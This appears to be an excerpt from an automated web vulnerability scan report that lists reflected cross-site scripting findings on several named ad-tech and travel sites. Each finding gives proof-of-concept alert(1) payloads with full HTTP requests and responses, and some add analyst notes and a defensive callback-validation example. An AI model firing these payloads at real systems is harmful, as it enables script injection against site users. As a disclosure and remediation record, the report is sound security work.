The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload abc66<script>alert(1)</script>6d35eb2d05e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /geosearch/service/json/suggest/citiesAndAirports?name=b&callback=dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e HTTP/1.1 Host: matrix.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 83c7a<script>alert(1)</script>1b026227aec was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 5d5d4<script>alert(1)</script>92fc2adddae was submitted in the name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the body below is a JSON document with the payload inside a string value; whether a browser would ever render it as HTML depends on the response's Content-Type and X-Content-Type-Options headers, which are not shown here, so check them before treating this as exploitable reflected XSS.
{}&&{"error":{"message":"Unrecognized search name \"specificDates5d5d4<script>alert(1)</script>92fc2adddae\".","resultId":"dRTmERQSGdEwBNSoA0DBeB","type":"input"}}
The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload f3f22<script>alert(1)</script>35448f73c03 was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 1b93d<script>alert(1)</script>a1c82177a2e was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload 4722f<script>alert(1)</script>1af6d08d9bf was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 511dc<script>alert(1)</script>f934d3d7cbc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=7&mbox=sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc&mboxId=0&mboxTime=1303832144712&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 142 Date: Tue, 26 Apr 2011 20:59:38 GMT Server: Test & Target
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef was submitted in the mbox parameter. This input was echoed as 1c919<img src=a onerror=alert(1)>d785e4e61ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response body below is a JavaScript statement, with the value inside a single-quoted string argument to mboxFactories.get(...): the <img> tag only fires if the response is rendered as HTML (the sibling finding above was served as text/javascript), whereas a single quote would break out of the string directly in the script context, so test that context as well.
Request
GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 190 Date: Tue, 26 Apr 2011 21:03:53 GMT Server: Test & Target
if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event1c919<img src=a onerror=alert(1)>d785e4e61ef', 0).setOffer(new mboxOfferDefault()).loaded();}
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d3c5f<script>alert(1)</script>9584e60e0db was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that in the response body below the value is the unquoted second argument to mboxFactories.get(...), a JavaScript expression context rather than HTML text; the HTML payload turns that script into a syntax error, so the injection to test here is a JavaScript expression, and the fix is to validate mboxId as an integer before writing it out.
Request
GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0d3c5f<script>alert(1)</script>9584e60e0db&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 187 Date: Tue, 26 Apr 2011 21:04:00 GMT Server: Test & Target
if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0d3c5f<script>alert(1)</script>9584e60e0db).setOffer(new mboxOfferDefault()).loaded();}
The value of the px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33802'%3balert(1)//c94ddc006d4 was submitted in the px parameter. This input was echoed as 33802';alert(1)//c94ddc006d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response below is the text of a java.lang.NumberFormatException written into a single-quoted JavaScript string: the raw input reaches the page through the exception message, so the fix is both to reject non-numeric px values up front and to stop writing exception text into script output.
Request
GET /bht/?px=2033802'%3balert(1)//c94ddc006d4&v=1&rnd=1303843577231 HTTP/1.1 Host: p.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 96 Date: Tue, 26 Apr 2011 18:46:49 GMT
var error='java.lang.NumberFormatException: For input string: "2033802';alert(1)//c94ddc006d4"';
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba was submitted in the name parameter. This input was echoed as 78020<x style=x:expression(alert(1))>7f33d133aba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf287%3balert(1)//f83feec8c47 was submitted in the jscallback parameter. This input was echoed as bf287;alert(1)//f83feec8c47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1bf287%3balert(1)//f83feec8c47 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:47:18 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Tue, 26 Apr 2011 18:47:18 GMT Age: 0 Connection: keep-alive
5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://realestate.msn.us.intellitxt.com
Path: /intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7366'-alert(1)-'b7e52cebacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=20029&f7366'-alert(1)-'b7e52cebacd=1 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3AA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3QA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:46:03 GMT Age: 0 Connection: keep-alive Content-Length: 11116
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... tp://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=20000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110426184603";})();$iTXT.js.serverUrl='http://realestate.msn.us.intellitxt.com';$iTXT.js.pageQuery='ipid=20029&f7366'-alert(1)-'b7e52cebacd=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9c51d%3balert(1)//8c141cbb073 was submitted in the jscallback parameter. This input was echoed as 9c51d;alert(1)//8c141cbb073 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback09c51d%3balert(1)//8c141cbb073 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:47:45 GMT Age: 0 Connection: keep-alive Content-Length: 7166
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback09c51d;alert(1)//8c141cbb073({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
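The two jscallback findings above (al.asp and /v4/init) reflect a caller-supplied function name into an unquoted JavaScript expression, where no output encoding can help: the name has to be executable. The following is an added example, not code from the scanned application or from the report, showing the usual remedy, a strict allow-list on the callback name, together with a response that serialises its payload with JSON.stringify (which also addresses the quoted parameter-name finding at 5.165, where a hand-built object literal let a double quote escape). The regular expression, the length limit, the response headers and the function names are assumptions; the legitimate callback name and the payloads are taken from the requests shown above.

```javascript
// Added example, not code from the scanned application: validating a JSONP
// callback name before it is echoed into a script response, the context of the
// jscallback findings above. The regular expression, length limit and response
// shape are assumptions; the legitimate callback name is the one visible in
// the report's requests.

// Constructed inputs taken from the report: the real callback and the payload.
const LEGIT_CALLBACK = '$iTXT.js.callback0';
const CALLBACK_PAYLOAD = '$iTXT.js.callback09c51d;alert(1)//8c141cbb073';

// A callback is a dotted chain of JavaScript identifiers. Anything else,
// including ';', '(', quotes and whitespace, is rejected rather than escaped:
// there is no safe way to "encode" an expression that must be executable.
const IDENT = '[A-Za-z_$][A-Za-z0-9_$]*';
const CALLBACK_RE = new RegExp(`^${IDENT}(\\.${IDENT})*$`);
const MAX_CALLBACK_LENGTH = 128;

function isValidCallbackName(name) {
  return typeof name === 'string'
    && name.length <= MAX_CALLBACK_LENGTH
    && CALLBACK_RE.test(name);
}

// Build the JSONP response. The payload is serialised with JSON.stringify, so
// object keys containing a double quote (the 5.165 case) come out escaped. The
// leading comment keeps attacker-influenced bytes away from the start of the
// body, and nosniff prevents the response being sniffed as another type.
function renderJsonp(callbackName, payload) {
  if (!isValidCallbackName(callbackName)) {
    throw new Error('rejected JSONP callback name');
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/${callbackName}(${JSON.stringify(payload)});`,
  };
}

// Wrapper returning null instead of throwing, for callers that want to fall
// back to a plain JSON response when no acceptable callback is supplied.
function tryRenderJsonp(callbackName, payload) {
  return isValidCallbackName(callbackName) ? renderJsonp(callbackName, payload) : null;
}
```

`isValidCallbackName` accepts `$iTXT.js.callback0` and rejects the scanner's payload because of the semicolon; the name-injection payload from 5.165 is rejected because of the quotes. Rejecting rather than sanitising is deliberate: stripping characters from an attacker-chosen expression and executing what is left is how these bugs reappear.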
5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://realestate.msn.us.intellitxt.com
Path: /v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4bd9"-alert(1)-"7a83dccfee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback0&a4bd9"-alert(1)-"7a83dccfee2=1 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:47:55 GMT Age: 0 Connection: keep-alive Content-Length: 7147
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... illa/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","a4bd9"-alert(1)-"7a83dccfee2":"1","reg":"tx","refurl":"http://realestate.msn.com/article.aspx?cp-documentid\u003d28280145","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iT ...[SNIP]...
The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6b87'%3balert(1)//32ed94e5709 was submitted in the ctp parameter. This input was echoed as d6b87';alert(1)//32ed94e5709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848188756&pt=%7Ccategory_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43552%7C1%3Apromtype%253Dinternald6b87'%3balert(1)//32ed94e5709&l=1 HTTP/1.1 Host: recs.richrelevance.com Proxy-Connection: keep-alive Referer: http://west.thomson.com/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'category_page.bottom',html:'<div class="r3_recommendations"><div ...[SNIP]... <a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internald6b87';alert(1)//32ed94e5709"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. (The scanner reports the parameter name as 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click because the semicolon-delimited path segments were parsed as part of the name; the request below shows the payload in click.) The payload 786bc"-alert(1)-"2db9af1c3c0 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:40:40 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd9e"-alert(1)-"1376e3d3251 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
